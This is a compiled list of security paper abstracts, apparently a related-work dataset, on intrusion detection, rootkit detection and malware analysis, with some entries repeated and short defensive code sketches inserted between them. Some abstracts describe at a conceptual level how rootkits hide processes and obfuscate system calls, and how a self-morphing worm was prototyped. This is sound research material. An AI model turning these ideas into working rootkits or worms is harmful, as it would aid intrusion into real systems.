--- paper_title: Outside the Closed World: On Using Machine Learning for Network Intrusion Detection paper_content: In network intrusion detection research, one popular strategy for finding attacks is monitoring a network's activity for anomalies: deviations from profiles of normality previously learned from benign traffic, typically identified using tools borrowed from the machine learning community. However, despite extensive academic research one finds a striking gap in terms of actual deployments of such systems: compared with other intrusion detection approaches, machine learning is rarely employed in operational "real world" settings. We examine the differences between the network intrusion detection problem and other areas where machine learning regularly finds much more success. Our main claim is that the task of finding attacks is fundamentally different from these other applications, making it significantly harder for the intrusion detection community to employ machine learning effectively. We support this claim by identifying challenges particular to network intrusion detection, and provide a set of guidelines meant to strengthen future research on anomaly detection.
--- paper_title: An architecture for specification-based detection of semantic integrity violations in kernel dynamic data paper_content: The ability of intruders to hide their presence in compromised systems has surpassed the ability of the current generation of integrity monitors to detect them. Once in control of a system, intruders modify the state of constantly-changing dynamic kernel data structures to hide their processes and elevate their privileges. Current monitoring tools are limited to detecting changes in nominally static kernel data and text and cannot distinguish a valid state change from tampering in these dynamic data structures. We introduce a novel general architecture for defining and monitoring semantic integrity constraints using a specification language-based approach. This approach will enable a new generation of integrity monitors to distinguish valid states from tampering.
--- paper_title: A survey of data mining techniques for malware detection using file features paper_content: This paper presents a survey of data mining techniques for malware detection using file features. The techniques are categorized based upon a three tier hierarchy that includes file features, analysis type and detection type. File features are the features extracted from binary programs, analysis type is either static or dynamic, and the detection type is borrowed from intrusion detection as either misuse or anomaly detection. It provides the reader with the major advancement in the malware research using data mining on file features and categorizes the surveyed work based upon the above stated hierarchy. This served as the major contribution of this paper.
--- paper_title: Robust signatures for kernel data structures paper_content: Kernel-mode rootkits hide objects such as processes and threads using a technique known as Direct Kernel Object Manipulation (DKOM). Many forensic analysis tools attempt to detect these hidden objects by scanning kernel memory with handmade signatures; however, such signatures are brittle and rely on non-essential features of these data structures, making them easy to evade. In this paper, we present an automated mechanism for generating signatures for kernel data structures and show that these signatures are robust: attempts to evade the signature by modifying the structure contents will cause the OS to consider the object invalid. Using dynamic analysis, we profile the target data structure to determine commonly used fields, and we then fuzz those fields to determine which are essential to the correct operation of the OS. These fields form the basis of a signature for the data structure. In our experiments, our new signature matched the accuracy of existing scanners for traditional malware and found processes hidden with our prototype rootkit that all current signatures missed. Our techniques significantly increase the difficulty of hiding objects from signature scanning.
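The robust-signature work above scans kernel memory for objects whose essential fields satisfy value invariants. The following toy scanner shows the shape of such a scan: slide a candidate layout across a memory snapshot and keep offsets where the constrained fields look plausible. The structure layout, the magic value, and the field constraints are invented for illustration and do not correspond to real Windows or Linux kernel objects.

```c
/* Toy memory scan with a value-constraint signature, in the spirit of the
 * robust-signature work: slide a candidate layout over a snapshot and keep
 * offsets where "essential" fields satisfy their invariants.  The layout and
 * the constraints below are invented for illustration; real signatures are
 * derived from profiling and fuzzing actual kernel objects. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

struct fake_proc {            /* hypothetical process-like object */
    uint32_t magic;           /* tag field, expected to be 0x50524F43 ("PROC") */
    uint32_t pid;             /* plausible PIDs only */
    uint32_t state;           /* small enumeration */
};

static int matches_signature(const unsigned char *p)
{
    struct fake_proc cand;
    memcpy(&cand, p, sizeof cand);                 /* avoid alignment issues */
    return cand.magic == 0x50524F43u &&
           cand.pid > 0 && cand.pid < 4194304u &&  /* typical pid_max upper bound */
           cand.state <= 4u;
}

int main(void)
{
    static unsigned char snapshot[1 << 16];        /* zeroed "memory image" */

    /* Plant one object in the snapshot so the scan has something to find. */
    struct fake_proc planted = { 0x50524F43u, 1234u, 1u };
    memcpy(snapshot + 4096, &planted, sizeof planted);

    for (size_t off = 0; off + sizeof(struct fake_proc) <= sizeof snapshot; off++)
        if (matches_signature(snapshot + off))
            printf("candidate object at offset %zu\n", off);

    return 0;
}
```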
In this paper, we present an automated mechanism for generating signatures for kernel data structures and show that these signatures are robust: attempts to evade the signature by modifying the structure contents will cause the OS to consider the object invalid. Using dynamic analysis, we profile the target data structure to determine commonly used fields, and we then fuzz those fields to determine which are essential to the correct operation of the OS. These fields form the basis of a signature for the data structure. In our experiments, our new signature matched the accuracy of existing scanners for traditional malware and found processes hidden with our prototype rootkit that all current signatures missed. Our techniques significantly increase the difficulty of hiding objects from signature scanning. --- paper_title: Operating System Interface Obfuscation and the Revealing of Hidden Operations paper_content: Many software security solutions--including malware analyzers, information flow tracking systems, auditing utilities, and host-based intrusion detectors--rely on knowledge of standard system call interfaces to reason about process execution behavior. In this work, we show how a rootkit can obfuscate a commodity kernel's system call interfaces to degrade the effectiveness of these tools. Our attack, called Illusion, allows user-level malware to invoke privileged kernel operations without requiring the malware to call the actual system calls corresponding to the operations. The Illusion interface hides system operations from user-, kernel-, and hypervisor-level monitors mediating the conventional system-call interface. Illusion alters neither static kernel code nor read-only dispatch tables, remaining elusive from tools protecting kernel memory. We then consider the problem of Illusion attacks and augment system call data with kernel-level execution information to expose the hidden kernel operations. We present a Xen-based monitoring system, Sherlock, that adds kernel execution watchpoints to the stream of system calls. Sherlock automatically adapts its sensitivity based on security requirements to remain performant on desktop systems: in normal execution, it adds 1% to 10% overhead to a variety of workloads. --- paper_title: Guest-Transparent Prevention of Kernel Rootkits with VMM-based Memory Shadowing paper_content: Kernel rootkits pose a significant threat to computer systems as they run at the highest privilege level and have unrestricted access to the resources of their victims. Many current efforts in kernel rootkit defense focus on the detectionof kernel rootkits --- after a rootkit attack has taken place, while the smaller number of efforts in kernel rootkit preventionexhibit limitations in their capability or deployability. In this paper we present a kernel rootkit prevention system called NICKLE which addresses a common, fundamental characteristic of most kernel rootkits: the need for executing their own kernel code. NICKLE is a lightweight, virtual machine monitor (VMM) based system that transparently prevents unauthorized kernel code execution for unmodified commodity (guest) OSes. NICKLE is based on a new scheme called memory shadowing, wherein the trusted VMM maintains a shadow physical memory for a running VM and performs real-time kernel code authentication so that only authenticated kernel code will be stored in the shadow memory. Further, NICKLE transparently routes guest kernel instruction fetches to the shadow memory at runtime. 
By doing so, NICKLE guarantees that only the authenticated kernel code will be executed, foiling the kernel rootkit's attempt to strike in the first place. We have implemented NICKLE in three VMM platforms: QEMU+KQEMU, VirtualBox, and VMware Workstation. Our experiments with 23 real-world kernel rootkits targeting the Linux or Windows OSes demonstrate NICKLE's effectiveness. Furthermore, our performance evaluation shows that NICKLE introduces small overhead to the VMM platform. --- paper_title: SecVisor: a tiny hypervisor to provide lifetime kernel code integrity for commodity OSes paper_content: We propose SecVisor, a tiny hypervisor that ensures code integrity for commodity OS kernels. In particular, SecVisor ensures that only user-approved code can execute in kernel mode over the entire system lifetime. This protects the kernel against code injection attacks, such as kernel rootkits. SecVisor can achieve this property even against an attacker who controls everything but the CPU, the memory controller, and system memory chips. Further, SecVisor can even defend against attackers with knowledge of zero-day kernel exploits. Our goal is to make SecVisor amenable to formal verification and manual audit, thereby making it possible to rule out known classes of vulnerabilities. To this end, SecVisor offers small code size and small external interface. We rely on memory virtualization to build SecVisor and implement two versions, one using software memory virtualization and the other using CPU-supported memory virtualization. The code sizes of the runtime portions of these versions are 1739 and 1112 lines, respectively. The size of the external interface for both versions of SecVisor is 2 hypercalls. It is easy to port OS kernels to SecVisor. We port the Linux kernel version 2.6.20 by adding 12 lines and deleting 81 lines, out of a total of approximately 4.3 million lines of code in the kernel. --- paper_title: Automatic placement of authorization hooks in the linux security modules framework paper_content: We present a technique for automatic placement of authorization hooks, and apply it to the Linux security modules (LSM) framework. LSM is a generic framework which allows diverse authorization policies to be enforced by the Linux kernel. It consists of a kernel module which encapsulates an authorization policy, and hooks into the kernel module placed at appropriate locations in the Linux kernel. The kernel enforces the authorization policy using hook calls. In current practice, hooks are placed manually in the kernel. This approach is tedious, and as prior work has shown, is prone to security holes. Our technique uses static analysis of the Linux kernel and the kernel module to automate hook placement. Given a non-hook-placed version of the Linux kernel, and a kernel module that implements an authorization policy, our technique infers the set of operations authorized by each hook, and the set of operations performed by each function in the kernel. It uses this information to infer the set of hooks that must guard each kernel function. We describe the design and implementation of a prototype tool called TAHOE (Tool for Authorization Hook Placement) that uses this technique. We demonstrate the effectiveness of TAHOE by using it with the LSM implementation of security-enhanced Linux (selinux). While our exposition in this paper focuses on hook placement for LSM, our technique can be used to place hooks in other LSM-like architectures as well.
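The kernel-integrity entries above (GhostBuster's cross-view diff, Copilot, Gibraltar, NICKLE, SecVisor) share one recurring idea: compare a high-level, possibly lied-to view of system state with a more trustworthy low-level view and treat any difference as evidence of hiding. The sketch below is a minimal user-space illustration of that cross-view diff on Linux, comparing PIDs enumerated through /proc with PIDs discovered by probing the kernel via kill(pid, 0); the PID range and function names are illustrative assumptions, and a real monitor would obtain its trusted view from outside the kernel (a coprocessor or VMM) rather than from system calls.

```python
import errno
import os

def pids_from_proc() -> set:
    """High-level view: processes enumerated via the /proc filesystem."""
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}

def pids_from_probe(max_pid: int = 32768) -> set:
    """Low-level view: brute-force probe of the PID space with kill(pid, 0).

    Signal 0 performs existence/permission checks only; EPERM still proves
    the PID exists, while ESRCH means it does not.
    """
    alive = set()
    for pid in range(2, max_pid + 1):
        try:
            os.kill(pid, 0)
            alive.add(pid)
        except OSError as exc:
            if exc.errno == errno.EPERM:
                alive.add(pid)
            # ESRCH: no such process; ignore.
    return alive

if __name__ == "__main__":
    hidden = pids_from_probe() - pids_from_proc()
    # A non-empty difference is suspicious: something answers at the
    # system-call level but is not enumerated by the standard /proc view.
    print("PIDs visible to kill() but missing from /proc:", sorted(hidden))
```

Processes that start or exit between the two scans will appear as transient noise, and a rootkit that filters the system-call layer itself (as the Illusion attack described above does) can deceive both views, which is exactly why the cited systems push the trusted view below the operating system.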
--- paper_title: Multi-aspect profiling of kernel rootkit behavior paper_content: Kernel rootkits, malicious software designed to compromise a running operating system kernel, are difficult to analyze and profile due to their elusive nature, the variety and complexity of their behavior, and the privilege level at which they run. However, a comprehensive kernel rootkit profile that reveals key aspects of the rootkit's behavior is helpful in aiding a detailed manual analysis by a human expert. In this paper we present PoKeR, a kernel rootkit profiler capable of producing multi-aspect rootkit profiles which include the revelation of rootkit hooking behavior, the exposure of targeted kernel objects (both static and dynamic), assessment of user-level impacts, as well as the extraction of kernel rootkit code. The system is designed to be deployed in scenarios which can tolerate high overheads, such as honeypots. Our evaluation results with a number of real-world kernel rootkits show that PoKeR is able to accurately profile a variety of rootkits ranging from traditional ones with system call hooking to more advanced ones with direct kernel object manipulation. The obtained profiles lead to unique insights into the rootkits' characteristics and demonstrate PoKeR's usefulness as a tool for rootkit investigators. --- paper_title: A Virtual Machine Introspection Based Architecture for Intrusion Detection paper_content: Today’s architectures for intrusion detection force the IDS designer to make a difficult choice. If the IDS resides on the host, it has an excellent view of what is happening in that host’s software, but is highly susceptible to attack. On the other hand, if the IDS resides in the network, it is more resistant to attack, but has a poor view of what is happening inside the host, making it more susceptible to evasion. In this paper we present an architecture that retains the visibility of a host-based IDS, but pulls the IDS outside of the host for greater attack resistance. We achieve this through the use of a virtual machine monitor. Using this approach allows us to isolate the IDS from the monitored host but still retain excellent visibility into the host’s state. The VMM also offers us the unique ability to completely mediate interactions between the host software and the underlying hardware. We present a detailed study of our architecture, including Livewire, a prototype implementation. We demonstrate Livewire by implementing a suite of simple intrusion detection policies and using them to detect real attacks. --- paper_title: Valgrind: a framework for heavyweight dynamic binary instrumentation paper_content: Dynamic binary instrumentation (DBI) frameworks make it easy to build dynamic binary analysis (DBA) tools such as checkers and profilers. Much of the focus on DBI frameworks has been on performance; little attention has been paid to their capabilities. As a result, we believe the potential of DBI has not been fully exploited. In this paper we describe Valgrind, a DBI framework designed for building heavyweight DBA tools. We focus on its unique support for shadow values-a powerful but previously little-studied and difficult-to-implement DBA technique, which requires a tool to shadow every register and memory value with another value that describes it. This support accounts for several crucial design features that distinguish Valgrind from other DBI frameworks. 
Because of these features, lightweight tools built with Valgrind run comparatively slowly, but Valgrind can be used to build more interesting, heavyweight tools that are difficult or impossible to build with other DBI frameworks such as Pin and DynamoRIO. --- paper_title: Operating System Interface Obfuscation and the Revealing of Hidden Operations paper_content: Many software security solutions--including malware analyzers, information flow tracking systems, auditing utilities, and host-based intrusion detectors--rely on knowledge of standard system call interfaces to reason about process execution behavior. In this work, we show how a rootkit can obfuscate a commodity kernel's system call interfaces to degrade the effectiveness of these tools. Our attack, called Illusion, allows user-level malware to invoke privileged kernel operations without requiring the malware to call the actual system calls corresponding to the operations. The Illusion interface hides system operations from user-, kernel-, and hypervisor-level monitors mediating the conventional system-call interface. Illusion alters neither static kernel code nor read-only dispatch tables, remaining elusive from tools protecting kernel memory. We then consider the problem of Illusion attacks and augment system call data with kernel-level execution information to expose the hidden kernel operations. We present a Xen-based monitoring system, Sherlock, that adds kernel execution watchpoints to the stream of system calls. Sherlock automatically adapts its sensitivity based on security requirements to remain performant on desktop systems: in normal execution, it adds 1% to 10% overhead to a variety of workloads. --- paper_title: The Art of Computer Virus Research and Defense paper_content: "Of all the computer-related books I've read recently, this one influenced my thoughts about security the most. There is very little trustworthy information about computer viruses. Peter Szor is one of the best virus analysts in the world and has the perfect credentials to write this book."-Halvar Flake, Reverse Engineer, SABRE Security GmbHSymantec's chief antivirus researcher has written the definitive guide to contemporary virus threats, defense techniques, and analysis tools. Unlike most books on computer viruses, The Art of Computer Virus Research and Defense is a reference written strictly for white hats: IT and security professionals responsible for protecting their organizations against malware. Peter Szor systematically covers everything you need to know, including virus behavior and classification, protection strategies, antivirus and worm-blocking techniques, and much more.Szor presents the state-of-the-art in both malware and protection, providing the full technical detail that professionals need to handle increasingly complex attacks. Along the way, he provides extensive information on code metamorphism and other emerging techniques, so you can anticipate and prepare for future threats.Szor also offers the most thorough and practical primer on virus analysis ever published-addressing everything from creating your own personal laboratory to automating the analysis process. 
This book's coverage includes Discovering how malicious code attacks on a variety of platforms Classifying malware strategies for infection, in-memory operation, self-protection, payload delivery, exploitation, and more Identifying and responding to code obfuscation threats: encrypted, polymorphic, and metamorphic Mastering empirical methods for analyzing malicious code-and what to do with what you learn Reverse-engineering malicious code with disassemblers, debuggers, emulators, and virtual machines Implementing technical defenses: scanning, code emulation, disinfection, inoculation, integrity checking, sandboxing, honeypots, behavior blocking, and much more Using worm blocking, host-based intrusion prevention, and network-level defense strategies © Copyright Pearson Education. All rights reserved. --- paper_title: DroidAnalyst: Synergic App Framework for Static and Dynamic App Analysis paper_content: Evolution of mobile devices, availability of additional resources coupled with enhanced functionality has leveraged smartphone to substitute the conventional computing devices. Mobile device users have adopted smartphones for online payments, sending emails, social networking, and stores the user sensitive information. The ever increasing mobile devices has attracted malware authors and cybercriminals to target mobile platforms. Android, the most popular open source mobile OS is being targeted by the malware writers. In particular, less monitored third party markets are being used as infection and propagation sources. Given the threats posed by the increasing number of malicious apps, security researchers must be able to analyze the malware quickly and efficiently; this may not be feasible with the manual analysis. Hence, automated analysis techniques for app vetting and malware detection are necessary. In this chapter, we present DroidAnalyst, a novel automated app vetting and malware analysis framework that integrates the synergy of static and dynamic analysis to improve accuracy and efficiency of analysis. DroidAnalyst generates a unified analysis model that combines the strengths of the complementary approaches with multiple detection methods, to increase the app code analysis. We have evaluated our proposed solution DroidAnalyst against a reasonable dataset consisting real-world benign and malware apps. --- paper_title: Detecting and classifying method based on similarity matching of Android malware behavior with profile paper_content: AbstractMass-market mobile security threats have increased ::: recently due to the growth of mobile technologies and the popularity of mobile devices. Accordingly, techniques have been introduced for identifying, classifying, and defending against mobile threats utilizing static, dynamic, on-device, and off-device techniques. Static techniques are easy to evade, while dynamic techniques are expensive. On-device techniques are evasion, while off-device techniques need being always online. To address some of those shortcomings, we introduce Andro-profiler, a hybrid behavior based analysis and classification system for mobile malware. Andro-profiler main goals are efficiency, scalability, and accuracy. For that, Andro-profiler classifies malware by exploiting the behavior profiling extracted from the integrated system logs including system calls. Andro-profiler executes a malicious application on an emulator in order to generate the integrated system logs, and creates human-readable behavior profiles by analyzing the integrated system logs. 
By comparing the behavior profile of malicious application with representative behavior profile for each malware family using a weighted similarity matching technique, Andro-profiler detects and classifies it into malware families. The experiment results demonstrate that Andro-profiler is scalable, performs well in detecting and classifying malware with accuracy greater than 98 %, outperforms the existing state-of-the-art work, and is capable of identifying 0-day mobile malware samples. --- paper_title: Searching for processes and threads in Microsoft Windows memory dumps paper_content: Current tools to analyze memory dumps of systems running Microsoft Windows usually build on the concept of enumerating lists maintained by the kernel to keep track of processes, threads and other objects. Therefore they will frequently fail to detect objects that are already terminated or which have been hidden by Direct Kernel Object Manipulation techniques. This article analyzes the in-memory structures which represent processes and threads. It develops search patterns which will then be used to scan the whole memory dump for traces of said objects, independent from the aforementioned lists. As demonstrated by a proof-of-concept implementation this approach could reveal hidden and terminated processes and threads, under some circumstances even after the system under examination has been rebooted. --- paper_title: Detecting Kernel-Level Rootkits Using Data Structure Invariants paper_content: Rootkits affect system security by modifying kernel data structures to achieve a variety of malicious goals. While early rootkits modified control data structures, such as the system call table and values of function pointers, recent work has demonstrated rootkits that maliciously modify noncontrol data. Most prior techniques for rootkit detection have focused solely on detecting control data modifications and, therefore, fail to detect such rootkits. This paper presents a novel technique to detect rootkits that modify both control and noncontrol data. The main idea is to externally observe the execution of the kernel during an inference phase and hypothesize invariants on kernel data structures. A rootkit detection phase uses these invariants as specifications of data structure integrity. During this phase, violation of invariants indicates an infection. We have implemented Gibraltar, a prototype tool that infers kernel data structure invariants and uses them to detect rootkits. Experiments show that Gibraltar can effectively detect previously known rootkits, including those that modify noncontrol data structures. --- paper_title: Shredding your garbage: Reducing data lifetime through secure deallocation paper_content: Today's operating systems, word processors, web browsers, and other common software take no measures to promptly remove data from memory. Consequently, sensitive data, such as passwords, social security numbers, and confidential documents, often remains in memory indefinitely, significantly increasing the risk of exposure. ::: ::: We present a strategy for reducing the lifetime of data in memory called secure deallocation. With secure deal-location we zero data either at deallocation or within a short, predictable period afterward in general system allocators (e.g. user heap, user stack, kernel heap). This substantially reduces data lifetime with minimal implementation effort, negligible overhead, and without modifying existing applications. 
::: ::: We demonstrate that secure deallocation generally clears data immediately after its last use, and that without such measures, data can remain in memory for days or weeks, even persisting across reboots. We further show that secure deallocation promptly eliminates sensitive data in a variety of important real world applications. --- paper_title: The Art of Computer Virus Research and Defense paper_content: "Of all the computer-related books I've read recently, this one influenced my thoughts about security the most. There is very little trustworthy information about computer viruses. Peter Szor is one of the best virus analysts in the world and has the perfect credentials to write this book."-Halvar Flake, Reverse Engineer, SABRE Security GmbHSymantec's chief antivirus researcher has written the definitive guide to contemporary virus threats, defense techniques, and analysis tools. Unlike most books on computer viruses, The Art of Computer Virus Research and Defense is a reference written strictly for white hats: IT and security professionals responsible for protecting their organizations against malware. Peter Szor systematically covers everything you need to know, including virus behavior and classification, protection strategies, antivirus and worm-blocking techniques, and much more.Szor presents the state-of-the-art in both malware and protection, providing the full technical detail that professionals need to handle increasingly complex attacks. Along the way, he provides extensive information on code metamorphism and other emerging techniques, so you can anticipate and prepare for future threats.Szor also offers the most thorough and practical primer on virus analysis ever published-addressing everything from creating your own personal laboratory to automating the analysis process. This book's coverage includes Discovering how malicious code attacks on a variety of platforms Classifying malware strategies for infection, in-memory operation, self-protection, payload delivery, exploitation, and more Identifying and responding to code obfuscation threats: encrypted, polymorphic, and metamorphic Mastering empirical methods for analyzing malicious code-and what to do with what you learn Reverse-engineering malicious code with disassemblers, debuggers, emulators, and virtual machines Implementing technical defenses: scanning, code emulation, disinfection, inoculation, integrity checking, sandboxing, honeypots, behavior blocking, and much more Using worm blocking, host-based intrusion prevention, and network-level defense strategies © Copyright Pearson Education. All rights reserved. --- paper_title: A survey of data mining techniques for malware detection using file features paper_content: This paper presents a survey of data mining techniques for malware detection using file features. The techniques are categorized based upon a three tier hierarchy that includes file features, analysis type and detection type. File features are the features extracted from binary programs, analysis type is either static or dynamic, and the detection type is borrowed from intrusion detection as either misuse or anomaly detection. It provides the reader with the major advancement in the malware research using data mining on file features and categorizes the surveyed work based upon the above stated hierarchy. This served as the major contribution of this paper. 
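The behavior-based classifiers summarized above (DroidAnalyst, Andro-profiler) assign a sample to a malware family by comparing its runtime behavior profile against representative family profiles with a weighted similarity measure. The snippet below is a minimal sketch of that idea, not the papers' actual pipeline: profiles are reduced to system-call frequency vectors, similarity is weighted cosine, and the family profiles, per-call weights, and acceptance threshold are invented for illustration.

```python
import math
from collections import Counter

def weighted_cosine(p: Counter, q: Counter, w: dict) -> float:
    """Cosine similarity between two event-count profiles with per-event weights."""
    keys = set(p) | set(q)
    dot = sum(w.get(k, 1.0) * p[k] * q[k] for k in keys)
    norm_p = math.sqrt(sum(w.get(k, 1.0) * p[k] ** 2 for k in p))
    norm_q = math.sqrt(sum(w.get(k, 1.0) * q[k] ** 2 for k in q))
    return dot / (norm_p * norm_q) if norm_p and norm_q else 0.0

def classify(sample: Counter, families: dict, weights: dict,
             threshold: float = 0.8) -> str:
    """Assign the sample to the most similar family, or 'unknown' below threshold."""
    best_family, best_score = "unknown", 0.0
    for name, profile in families.items():
        score = weighted_cosine(sample, profile, weights)
        if score > best_score:
            best_family, best_score = name, score
    return best_family if best_score >= threshold else "unknown"

if __name__ == "__main__":
    # Hypothetical family profiles built from traces of known samples.
    families = {
        "sms_trojan": Counter({"sendto": 120, "open": 30, "write": 25}),
        "spyware":    Counter({"read": 200, "open": 90, "connect": 40}),
    }
    weights = {"sendto": 2.0, "connect": 1.5}   # emphasize network-related calls
    sample = Counter({"sendto": 80, "open": 20, "write": 10})
    print(classify(sample, families, weights))
```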
--- paper_title: Robust signatures for kernel data structures paper_content: Kernel-mode rootkits hide objects such as processes and threads using a technique known as Direct Kernel Object Manipulation (DKOM). Many forensic analysis tools attempt to detect these hidden objects by scanning kernel memory with handmade signatures; however, such signatures are brittle and rely on non-essential features of these data structures, making them easy to evade. In this paper, we present an automated mechanism for generating signatures for kernel data structures and show that these signatures are robust: attempts to evade the signature by modifying the structure contents will cause the OS to consider the object invalid. Using dynamic analysis, we profile the target data structure to determine commonly used fields, and we then fuzz those fields to determine which are essential to the correct operation of the OS. These fields form the basis of a signature for the data structure. In our experiments, our new signature matched the accuracy of existing scanners for traditional malware and found processes hidden with our prototype rootkit that all current signatures missed. Our techniques significantly increase the difficulty of hiding objects from signature scanning. --- paper_title: New malicious code detection using variable length n-grams paper_content: Most of the commercial antivirus software fail to detect unknown and new malicious code. In order to handle this problem generic virus detection is a viable option. Generic virus detector needs features that are common to viruses. Recently Kolter et al. [16] propose an efficient generic virus detector using n-grams as features. The fixed length n-grams used there suffer from the drawback that they cannot capture meaningful sequences of different lengths. In this paper we propose a new method of variable-length n-grams extraction based on the concept of episodes and demonstrate that they outperform fixed length n-grams in malicious code detection. The proposed algorithm requires only two scans over the whole data set whereas most of the classical algorithms require scans proportional to the maximum length of n-grams. --- paper_title: Information flow control for standard OS abstractions paper_content: Decentralized Information Flow Control (DIFC) is an approach to security that allows application writers to control how data flows between the pieces of an application and the outside world. As applied to privacy, DIFC allows untrusted software to compute with private data while trusted security code controls the release of that data. As applied to integrity, DIFC allows trusted code to protect untrusted software from unexpected malicious inputs. In either case, only bugs in the trusted code, which tends to be small and isolated, can lead to security violations. We present Flume, a new DIFC model that applies at the granularity of operating system processes and standard OS abstractions (e.g., pipes and file descriptors). Flume was designed for simplicity of mechanism, to ease DIFC's use in existing applications, and to allow safe interaction between conventional and DIFC-aware processes. Flume runs as a user-level reference monitor onLinux. A process confined by Flume cannot perform most system calls directly; instead, an interposition layer replaces system calls with IPCto the reference monitor, which enforces data flowpolicies and performs safe operations on the process's behalf. 
We ported a complex web application (MoinMoin Wiki) to Flume, changing only 2% of the original code. Performance measurements show a 43% slowdown on read workloads and a 34% slowdown on write workloads, which are mostly due to Flume's user-level implementation. --- paper_title: A sense of self for Unix processes paper_content: A method for anomaly detection is introduced in which "normal" is defined by short-range correlations in a process' system calls. Initial experiments suggest that the definition is stable during normal behavior for standard UNIX programs. Further, it is able to detect several common intrusions involving sendmail and lpr. This work is part of a research program aimed at building computer security systems that incorporate the mechanisms and algorithms used by natural immune systems. --- paper_title: Modeling malicious activities in cyber space paper_content: Cyber attacks are an unfortunate part of society as an increasing amount of critical infrastructure is managed and controlled via the Internet. In order to protect legitimate users, it is critical for us to obtain an accurate and timely understanding of our cyber opponents. However, at the moment we lack effective tools to do this. In this article we summarize the work on modeling malicious activities from various perspectives, discuss the pros and cons of current models, and present promising directions for possible efforts in the near future. --- paper_title: Anomaly detection using call stack information paper_content: The call stack of a program execution can be a very good information source for intrusion detection. There is no prior work on dynamically extracting information from the call stack and effectively using it to detect exploits. In this paper we propose a new method to do anomaly detection using call stack information. The basic idea is to extract return addresses from the call stack, and generate an abstract execution path between two program execution points. Experiments show that our method can detect some attacks that cannot be detected by other approaches, while its convergence and false positive performance is comparable to or better than the other approaches. We compare our method with other approaches by analyzing their underlying principles and thus achieve a better characterization of their performance, in particular on what and why attacks will be missed by the various approaches. --- paper_title: Visual correlation of host processes and network traffic paper_content: Anomalous communication patterns are one of the leading indicators of computer system intrusions according to the system administrators we have interviewed. But a major problem is being able to correlate across the host/network boundary to see how network connections are related to running processes on a host. This paper introduces Portall, a visualization tool that gives system administrators a view of the communicating processes on the monitored machine correlated with the network activity in which the processes participate. Portall is a prototype of part of the Network Eye framework we have introduced in an earlier paper (Ball, et al., 2004). We discuss the Portall visualization, the supporting infrastructure it requires, and a formative usability study we conducted to obtain administrators' reactions to the tool.
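The system-call sequence detectors above ("A sense of self for Unix processes" and its successors) define normality as the set of short call windows observed in benign traces and flag traces containing windows never seen during training. The following sketch shows that sliding-window scheme (often referred to as stide); the window length k, the toy traces, and any alarm threshold are illustrative choices rather than values taken from the papers.

```python
from typing import Iterable, List, Set, Tuple

def windows(trace: List[str], k: int) -> Iterable[Tuple[str, ...]]:
    """Yield every length-k sliding window over a system-call trace."""
    for i in range(len(trace) - k + 1):
        yield tuple(trace[i:i + k])

def train(normal_traces: List[List[str]], k: int = 3) -> Set[Tuple[str, ...]]:
    """Build the 'normal database': all k-grams observed in benign traces."""
    db = set()
    for trace in normal_traces:
        db.update(windows(trace, k))
    return db

def anomaly_rate(trace: List[str], db: Set[Tuple[str, ...]], k: int = 3) -> float:
    """Fraction of windows in the trace that were never seen during training."""
    ws = list(windows(trace, k))
    if not ws:
        return 0.0
    unseen = sum(1 for w in ws if w not in db)
    return unseen / len(ws)

if __name__ == "__main__":
    normal = [["open", "read", "mmap", "read", "close"],
              ["open", "read", "close"]]
    db = train(normal, k=3)
    attack = ["open", "read", "execve", "socket", "connect"]
    print(f"mismatch rate: {anomaly_rate(attack, db, k=3):.2f}")
    # A trace is flagged when its mismatch rate exceeds a chosen threshold.
```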
--- paper_title: Exploiting Execution Context for the Detection of Anomalous System Calls paper_content: Attacks against privileged applications can be detected by analyzing the stream of system calls issued during process execution. In the last few years, several approaches have been proposed to detect anomalous system calls. These approaches are mostly based on modeling acceptable system call sequences. Unfortunately, the techniques proposed so far are either vulnerable to certain evasion attacks or are too expensive to be practical. This paper presents a novel approach to the analysis of system calls that uses a composition of dynamic analysis and learning techniques to characterize anomalous system call invocations in terms of both the invocation context and the parameters passed to the system calls. Our technique provides a more precise detection model with respect to solutions proposed previously, and, in addition, it is able to detect data modification attacks, which cannot be detected using only system call sequence analysis. --- paper_title: Intrusion Detection Using Sequences of System Calls paper_content: A method is introduced for detecting intrusions at the level of privileged processes. Evidence is given that short sequences of system calls executed by running processes are a good discriminator between normal and abnormal operating characteristics of several common UNIX programs. Normal behavior is collected in two waysc Synthetically, by exercising as many normal modes of usage of a program as possible, and in a live user environment by tracing the actual execution of the program. In the former case several types of intrusive behavior were studieds in the latter case, results were analyzed for false positives. --- paper_title: Fool Me If You Can: Mimicking Attacks and Anti-Attacks in Cyberspace paper_content: Botnets have become major engines for malicious activities in cyberspace nowadays. To sustain their botnets and disguise their malicious actions, botnet owners are mimicking legitimate cyber behavior to fly under the radar. This poses a critical challenge in anomaly detection. In this paper, we use web browsing on popular web sites as an example to tackle this problem. First of all, we establish a semi-Markov model for browsing behavior. Based on this model, we find that it is impossible to detect mimicking attacks based on statistics if the number of active bots of the attacking botnet is sufficiently large (no less than the number of active legitimate users). However, we also find it is hard for botnet owners to satisfy the condition to carry out a mimicking attack most of the time. With this new finding, we conclude that mimicking attacks can be discriminated from genuine flash crowds using second order statistical metrics. We define a new fine correntropy metrics and show its effectiveness compared to others. Our real world data set experiments and simulations confirm our theoretical claims. Furthermore, the findings can be widely applied to similar situations in other research fields. --- paper_title: A Fast Automaton-Based Method for Detecting Anomalous Program Behaviors paper_content: Anomaly detection on system call sequences has become perhaps the most successful approach for detecting novel intrusions. A natural way for learning sequences is to use a finite-state automaton (FSA). However previous research indicates that FSA-learning is computationally expensive, that it cannot be completely automated or that the space usage of the FSA may be excessive. 
We present a new approach that overcomes these difficulties. Our approach builds a compact FSA in a fully automatic and efficient manner, without requiring access to source code for programs. The space requirements for the FSA is low - of the order of a few kilobytes for typical programs. The FSA uses only a constant time per system call during the learning as well as the detection period. This factor leads to low overheads for intrusion detection. Unlike many of the previous techniques, our FSA-technique can capture both short term and long term temporal relationships among system calls, and thus perform more accurate detection. This enables our approach to generalize and predict future behaviors from past behaviors. As a result, the training periods needed for our FSA based approach are shorter. Moreover false positives are reduced without increasing the likelihood of missing attacks. This paper describes our FSA based technique and presents a comprehensive experimental evaluation of the technique. --- paper_title: Metamorphic worm that carries its own morphing engine paper_content: Metamorphic malware changes its internal structure across generations, but its functionality remains unchanged. Well-designed metamorphic malware will evade signature detection. Recent research has revealed techniques based on hidden Markov models (HMMs) for detecting many types of metamorphic malware, as well as techniques for evading such detection. A worm is a type of malware that actively spreads across a network to other host systems. In this project we design and implement a prototype metamorphic worm that carries its own morphing engine. This is challenging, since the morphing engine itself must be morphed across replications, which imposes 